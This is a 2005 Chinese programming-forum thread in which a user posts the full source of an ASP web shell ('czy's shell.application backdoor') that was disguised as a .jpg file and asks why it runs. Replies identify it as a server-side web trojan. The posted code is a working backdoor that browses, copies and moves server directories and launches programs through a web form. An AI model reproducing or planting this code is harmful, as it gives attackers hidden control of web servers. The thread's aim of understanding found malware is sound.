标题:一个木马,偶不懂了~~~~~
只看楼主
yilinjun
Rank: 1
等 级:新手上路
帖 子:232
专家分:0
注 册:2005-6-5
 问题点数:0 回复次数:7 
一个木马,偶不懂了~~~~~

扩展名是:.jpg 却能执行~~~???? <%response.write "<font size=6 color=red>一次只能执行一个操作:)</font>" %> <%response.write now()%><BR>程序所在的物理路径: <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> <html> <title>czy's shell.application backdoor </title> <body> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=text value="<%= DSnXA %>"> 输入要浏览的目录<br> <input type=text name=text1 value="<%= DSnXA1 %>"> copy <input type=text name=text2 value="<%= DSnXA2 %>"><br> <input type=text name=text3 value="<%= DSnXA3 %>"> move <input type=text name=text4 value="<%= DSnXA4 %>"><br> 路径:<input type=text name=text5 value="<%= DSnXA5 %>"> 程序:<input type=text name=text6 value="<%= DSnXA6 %>"><br> <input type=submit name=sb value=发送命令> </form> </body> </html> <% DSnXA = Request.Form("text") '目录浏览 if (DSnXA <> "") then set shell=server.createobject("shell.application") '建立shell对象 set fod1=shell.namespace(DSnXA) set foditems=fod1.items for each co in foditems response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>" next end if %>

<% DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝 DSnXA2 = Request.Form("text2") if DSnXA1<>"" and DSnXA2<>"" then set shell1=server.createobject("shell.application") '建立shell对象 set fod1=shell1.namespace(DSnXA2)

for i=len(DSnXA1) to 1 step -1 if mid(DSnXA1,i,1)="\" then path=left(DSnXA1,i-1) exit for end if next

if len(path)=2 then path=path & "\" path2=right(DSnXA1,len(DSnXA1)-i) set fod2=shell1.namespace(path) set foditem=fod2.parsename(path2) fod1.copyhere foditem response.write "command completed success!" end if %>

<% DSnXA3 = Request.Form("text3") '目录移动 DSnXA4 = Request.Form("text4") if DSnXA3<>"" and DSnXA4<>"" then set shell2=server.createobject("shell.application") '建立shell对象 set fod1=shell2.namespace(DSnXA4)

for i=len(DSnXA3) to 1 step -1 if mid(DSnXA3,i,1)="\" then path=left(DSnXA3,i-1) exit for end if next

if len(path)=2 then path=path & "\" path2=right(DSnXA3,len(DSnXA3)-i) set fod2=shell2.namespace(path) set foditem=fod2.parsename(path2) fod1.movehere foditem response.write "command completed success!" end if %> <% DSnXA5 = Request.Form("text5") '执行程序要指定路径 DSnXA6 = Request.Form("text6") if DSnXA5<>"" and DSnXA6<>"" then set shell3=server.createobject("shell.application") '建立shell对象 shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb response.write "command completed success!" end if

%>

搜索更多相关主题的帖子: 木马 物理 response write 
2005-07-18 10:09
盖茨他爹
Rank: 6Rank: 6
等 级:贵宾
威 望:28
帖 子:5255
专家分:0
注 册:2005-5-3
得分:0 
木马就这一个文件?
以JPG为结尾在你的空间就能执行?
2005-07-18 10:23
hu_sir
Rank: 1
等 级:新手上路
帖 子:208
专家分:0
注 册:2004-4-29
得分:0 
。。。。。。。。。。。。。。。。。。。。。。。。。。。。

[此贴子已经被作者于2005-7-18 11:51:05编辑过]


2005-07-18 11:39
盖茨他爹
Rank: 6Rank: 6
等 级:贵宾
威 望:28
帖 子:5255
专家分:0
注 册:2005-5-3
得分:0 
哪里是EXE啊,是在服务器运行的WEB木马
2005-07-18 11:44
hu_sir
Rank: 1
等 级:新手上路
帖 子:208
专家分:0
注 册:2004-4-29
得分:0 
不好意思


开始看错了
2005-07-18 11:51
yilinjun
Rank: 1
等 级:新手上路
帖 子:232
专家分:0
注 册:2005-6-5
得分:0 
偶晕~~~

怎么会这样的呢~~

可是它是.jpg的呀~~

服务器为什么会解释成.asp呢~~

2005-07-18 17:15
盖茨他爹
Rank: 6Rank: 6
等 级:贵宾
威 望:28
帖 子:5255
专家分:0
注 册:2005-5-3
得分:0 
把木马压缩成RAR文件传上来,我在我的服务器上看看
2005-07-18 19:28
yilinjun
Rank: 1
等 级:新手上路
帖 子:232
专家分:0
注 册:2005-6-5
得分:0 
Kzzhpj08.rar (1002 Bytes) 一个木马,偶不懂了~~~~~

上来了~~~看看~~~··

2005-07-19 08:36



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-23142-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.015499 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved